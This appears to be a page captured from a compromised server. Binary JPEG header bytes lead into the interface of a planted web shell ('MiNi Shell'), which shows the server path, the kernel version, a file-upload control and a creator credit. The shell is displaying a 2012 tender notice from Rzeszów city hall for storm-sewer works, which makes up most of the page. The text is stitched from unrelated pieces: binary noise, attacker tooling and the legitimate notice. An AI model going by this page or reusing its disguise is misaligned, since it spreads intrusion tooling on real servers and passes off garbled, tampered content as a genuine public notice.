JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120824/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120824/183641-N-2012.html

<p class="kh_header"><b>Rzeszów: Rozdzielenie kanalizacji deszczowej od sanitarnej oraz wykonanie odcinków kanalizacji deszczowej od strony
 ul. Kraszewskiego, opracowanie projektu organizacji ruchu, wykonanie sieci wraz z kratami na podwórzu budynków przy ul. Kraszewskiego nr 3, 5 i 7 wraz z wykonaniem robót towarzyszących 
i uporządkowaniu terenu po wykonanych robotach w ramach zadania 
pn. Porządkowanie kanalizacji deszczowej w rejonie budynków Kraszewskiego 3 i 5. 

ZP.271.97.2012</b><br>
<b>Numer ogłoszenia: 183641 - 2012; data zamieszczenia: 24.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Rzeszów - Urząd Miasta  Rzeszowa , Rynek 1, 35-064 Rzeszów, woj. podkarpackie, tel. 017 8754636, faks 017 8754634.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rzeszow.pl; bip.erzeszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozdzielenie kanalizacji deszczowej od sanitarnej oraz wykonanie odcinków kanalizacji deszczowej od strony
 ul. Kraszewskiego, opracowanie projektu organizacji ruchu, wykonanie sieci wraz z kratami na podwórzu budynków przy ul. Kraszewskiego nr 3, 5 i 7 wraz z wykonaniem robót towarzyszących 
i uporządkowaniu terenu po wykonanych robotach w ramach zadania 
pn. Porządkowanie kanalizacji deszczowej w rejonie budynków Kraszewskiego 3 i 5. 

ZP.271.97.2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Porządkowanie kanalizacji deszczowej w rejonie budynków Kraszewskiego 3 i 5, które polega na rozdzieleniu kanalizacji deszczowej od sanitarnej, poprzez wykonanie odrębnej sieci kanalizacji deszczowej-grawitacyjnej, o średnicy rurociągów od fi 160 do fi  500  i wykonanie dwóch przewiertów 
pod ul. Unii Lubelskiej (P1 i P2), zabezpieczeniu kolizji z mediami, odbudowie nawierzchni dróg i chodników po wykonanych robotach oraz wykonaniu odcinków kanalizacji deszczowej od strony ulicy Kraszewskiego, opracowaniu projektu organizacji ruchu, wykonaniu sieci wraz z kratami na podwórzu budynków 
przy ul. Kraszewskiego nr 3, 5 i 7 wraz z wykonaniem robót towarzyszących 
i uporządkowaniu terenu po wykonanych robotach (z wyłączeniem wykonania wymiany odcinków przyłączy kanalizacji deszczowej od rur spustowych R13, , R14, R15, R16, R17, kraty K9, do pierwszej istniejącej studzienki kanalizacyjnej 
na podwórzu budynków przy ul. Kraszewskiego nr 3, 5 i 7, na trasie zaznaczonej na załączniku graficznym oznaczonym lit. A).
Szczegółowy zakres rzeczowy przedmiotu umowy określa dokumentacja projektowa (projekt budowlany i projekt wykonawczy), specyfikacja techniczna wykonania 
i odbioru robót budowlanych, załącznik graficzny oznaczony literą A, załączone do SIWZ w wersji elektronicznej i stanowiące integralną część umowy, 
Przedmiar robót stanowi materiał pomocniczy. 

Integralną część opisu przedmiotu zamówienia (obowiązki wykonawcy)  stanowi załączony do specyfikacji projekt umowy.

Zamawiający nie przewiduje udzielenia zamówień uzupełniających w rozumieniu 
art. 67 ust. 1 pkt 6..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.23.24.00-6, 45.23.20.00-2, 45.23.10.00-5, 45.10.00.00-8, 45.11.12.00-0, 45.23.32.20-7, 45.23.32.53-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2016.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium
1.	Zamawiający wymaga wniesienia wadium w wysokości 20 000 zł 
(słownie: dwadzieścia tysięcy złotych).
2.	Wadium należy wnieść do dnia składania ofert  do godziny składania ofert.

      Wadium może być wnoszone w jednej lub kilku następujących formach:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-  kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (j.t. Dz. U. z 2007 r. Nr 42, poz. 275 z późniejszymi zmianami).w formie poręczeń bankowych lub poręczeń spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,

3.	Wadium wnoszone w pieniądzu należy wpłacić na rachunek Urzędu Miasta Rzeszowa PEKAO S.A. I Oddział w Rzeszowie nr rachunku: 26 1240 1792 1111 0010 0486 8652 Sumy depozytowe Urzędu Miasta Rzeszowa. 
Za skuteczne wniesienie wadium w pieniądzu rozumie się, gdy w oznaczonym terminie, tj. do upływu terminu składania ofert nastąpi uznanie kwoty wadium na rachunku bankowym Zamawiającego.

4.	Wadium w innej formie niż pieniądz należy złożyć w sekretariacie Wydziału Zamówień Publicznych przy ul. Joselewicza 4, pok. nr 13 w formie oryginału. Prosimy nie załączać do oferty oryginału gwarancji lub poręczenia. Wadium w formie poręczenia lub gwarancji musi obejmować cały okres związania ofertą, a beneficjentem takich dokumentów musi być Zamawiający. Gwarancja poręczenie musi być podpisana przez upełnomocnionego przedstawiciela Gwaranta. Podpis winien być złożony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji /poręczenia winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium we wszystkich  okolicznościach określonych w art. 46 ust. 4a i 5 Pzp. 

5.	Wykonawcy, którego oferta zostanie wybrana, Zamawiający zatrzyma wadium wraz z odsetkami w przypadku gdy:
1)	odmówi podpisania umowy na warunkach określonych w ofercie,
2)	nie wniesie wymaganego zabezpieczenia należytego wykonania umowy
3)	zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy. 
Ponadto Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca 
w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 Pzp 
lub pełnomocnictwa, chyba, ze udowodni, że wynika to z przyczyn nieleżących 
po jego stronie.  

6.	W przypadku składania oferty wspólnej, wadium wniesione przez jednego 
ze wspólników uważa się za wniesione prawidłowo.

7.	Wartości podane w dokumentach w walutach innych niż wskazane 
przez Zamawiającego, będą przeliczane wg średniego kursu NBP na dzień wszczęcia postępowania o udzielenie niniejszego zamówienia publicznego. 
W przypadku gdy w dniu wszczęcia postępowania NBP nie opublikował średnich kursów walut, należy przyjąć pierwszy opublikowany po tej dacie średni kurs NBP.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie uprawnień do wykonywania określonej działalności 
lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
      
Dokumenty i oświadczenia potwierdzające spełnianie warunków udziału w postępowaniu:
a) oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust. 1 Pzp- 
- zawarte w druku OFERTA.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie wiedzy i doświadczenia niezbędnego do wykonania przedmiotu
zamówienia, tj. udokumentowanie wykonania, tj. zakończenia (rozpoczęcie
robót może mieć miejsce wcześniej), robót budowlanych w okresie ostatnich
5 lat przed upływem terminu składania ofert w niniejszym postępowaniu, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
co najmniej:
a) wykonanie co najmniej 1 roboty budowlanej polegającej na wykonaniu sieci
kanalizacji deszczowej lub kanalizacji sanitarnej o średnicy rur min. 300 mm 
i długości min. 100 m
b) wykonanie co najmniej 1 roboty budowlanej polegającej na wykonaniu przepustu 
o średnicy min 300 mm, wykonanego w technologii podwiertu bezwykopowego. 


Zamawiający uzna warunek za spełniony wtedy , gdy Wykonawca wykaże
doświadczenie określone w punktach a i b jako zrealizowane łącznie 
lub w oddzielnych zamówieniach.


Zamówienia winne zostać potwierdzone dokumentami, że roboty budowlane
zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (np. referencje).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie odpowiednim potencjałem technicznym. Dokumenty i oświadczenia potwierdzające spełnianie warunków udziału w postępowaniu:
a)	oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust. 1 Pzp- 
- zawarte w druku OFERTA</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie osobami zdolnymi do wykonania zamówienia: 

a)	Osobą, która będzie pełnić funkcję kierownika budowy branży sanitarnej, posiadająca uprawnienia budowlane bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub odpowiadające im ważne  uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów
b) osobą, która będzie pełnić funkcję kierownika robót posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń 
lub odpowiadające im ważne  uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdowanie się w sytuacji ekonomicznej i finansowej umożliwiającej wykonanie przedmiotu zamówienia  

Dokumenty i oświadczenia potwierdzające spełnianie warunków udziału w postępowaniu:
a)	oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust. 1 Pzp- 
- zawarte w druku OFERTA</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	druk OFERTA</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>§ 3 ust. 3 projektu umowy: W przypadku ustawowej zmiany stawek podatku od towarów i usług w trakcie realizacji umowy - w zakresie dotyczącym niezrealizowanej części  przedmiotu umowy wynagrodzenie ryczałtowe (brutto) zostanie odpowiednio zmodyfikowane, co wymaga zmiany umowy. § 14 projektu umowy: 
ZMIANY POSTANOWIEŃ UMOWY
1.	Strony mogą dokonywać zmian istotnych postanowień zawartej umowy w stosunku                      do treści oferty w przypadkach określonych w postanowieniach mowy i ust. 2.
2.	Zamawiający dopuszcza możliwość zmiany terminu wykonania umowy, z przyczyn niezależnych od Wykonawcy, w następujących okolicznościach:
1) spowodowanej warunkami atmosferycznymi uniemożliwiającymi prowadzenie robót budowlanych, w szczególności klęski żywiołowej, wystąpienia niskich temperatur, długotrwałe opady deszczu, śniegu, co zostanie potwierdzone przez inspektora nadzoru  w dzienniku budowy,
2) spowodowanej warunkami atmosferycznymi uniemożliwiającymi przeprowadzenie prób sprawdzeń oraz dokonywania odbioru, 
3) będącej następstwem okoliczności leżących po stronie Zamawiającego, w szczególności wstrzymanie robót przez Zamawiającego,
4) wystąpienia w trakcie robót budowlanych nieprzewidzianych okoliczności, np. kolizji                     z niezaznaczonymi na projekcie instalacjami i koniecznością wykonania robót dodatkowych, 
3.	Zamawiający dopuszcza, za zgodą projektanta, dokonanie zmiany sposobu  wykonania poszczególnych robót przy zachowaniu nie gorszych parametrów technicznych,  wytrzymałościowych itp. oraz zmiany wynagrodzenia w przypadku zastosowania  materiałów zamiennych, innych technologii lub rozwiązań, gdy zmiana taka jest korzystna dla  Zamawiającego i nie spowoduje wzrostu kosztów inwestycji. 
4. Zamawiający dopuszcza możliwość ograniczenia zakresu przedmiotu umowy oraz zmiany wynagrodzenia ryczałtowego jeżeli okaże się, że niektóre elementy wykonania robót będą zbędne z  punktu widzenia procesu inwestycyjnego. Zamawiający pisemnie poinformuje Wykonawcę o zbędności wykonania któregoś z elementu robót. Rozliczenie wyłączonych elementów robót nastąpi na podstawie harmonogramu rzeczowo-finansowego.
5. Zamawiający dopuszcza zmianę kwot, o których mowa w § 3 ust. 7 w przypadku zabezpieczenia środków finansowych w budżecie na wykonanie i fakturowanie większego zakresu robót budowlanych oraz zmian terminów, o których mowa w § 2 ust. 1 i zmiany   w § 3 ust 3.
6. Wszystkie zmiany umowy wymagają formy pisemnej (aneks do umowy) pod rygorem nieważności, za wyjątkiem zmian wymienionych w § 4.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.erzeszow.pl/zamowienia-publiczne/zamowienia-publiczne-urzedu-miasta-rzeszowa/wydzial-zamo<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Zamówień Publicznych, Urząd Miasta Rzeszowa, ul. Joselewicza 4, 35-064 Rzeszów, pok. nr 18..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2012 godzina 10:00, miejsce: Wydział Zamówień Publicznych, Urząd Miasta Rzeszowa, ul. Joselewicza 4, 35-064 Rzeszów, pok. nr 13..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający nie przewiduje zawarcia umowy ramowej oraz
ustanowienia dynamicznego systemu zakupów.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com